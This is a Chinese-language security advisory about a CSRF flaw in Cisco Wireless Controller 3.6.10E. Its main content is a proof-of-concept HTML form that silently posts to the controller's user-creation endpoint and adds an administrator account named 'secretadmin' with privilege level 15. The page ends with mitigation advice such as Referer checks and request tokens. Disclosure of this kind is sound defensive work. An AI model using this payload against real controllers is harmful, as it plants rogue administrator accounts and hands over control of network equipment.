首頁 > 安全研究 > 安全通報 > 安全通告

Cisco Wireless Controller 3.6.10E CSRF漏洞安全通告

發布時間 2019-07-26

漏洞編號和級別


CVE編號:暫無,危險級別:高危,CVSS分值:官方未評定


影響版本


受影響的版本


適用于Cisco Wireless Controller 3.6.10E。


漏洞概述


Cisco Wireless Controller 3.6.10E是Cisco發布的一款無線控制器,可為關鍵任務提供可靠的性能。


Cisco Wireless Controller 3.6.10E容易受到CSRF攻擊,攻擊者將精心設計的請求發送給具有管理員級別訪問權限的用戶,打開URL后,將通過管理員的會話提交表單,并成功將新用戶添加為管理員。


漏洞驗證


<html>


<body>


<form action="http://IP/security/cfgSecurityAAAUsersCreate


<http://192.168.1.1/security/cfgSecurityAAAUsersCreate>" method="POST">


<input type="hidden" name="username" value="secretadmin" />


<input type="hidden" name="privilege" value="15" />


<input type="hidden" name="password" value="K3Y" />


<input type="hidden" name="description" value="CSRF" />


<input type="hidden" name="type" value="lobby-admin" />


<input type="hidden" name="cfnpassword" value="K3Y" />


<input type="hidden" name="yearlife" value="2013" />


<input type="hidden" name="hourlife" value="16" />


<input type="hidden" name="monthlife" value="7" />


<input type="hidden" name="minlife" value="17" />


<input type="hidden" name="datelife" value="16" />


<input type="hidden" name="seclife" value="0" />


<input type="submit" value="submit" />


</form>


</body>


</html>


修復建議


1、關注官方網站,及時進行更新;


2、驗證HTTP Referer字段;


3、在請求地址中添加token并驗證;


4、在HTTP頭中自定義屬性并驗證。


參考鏈接

上一篇 下一篇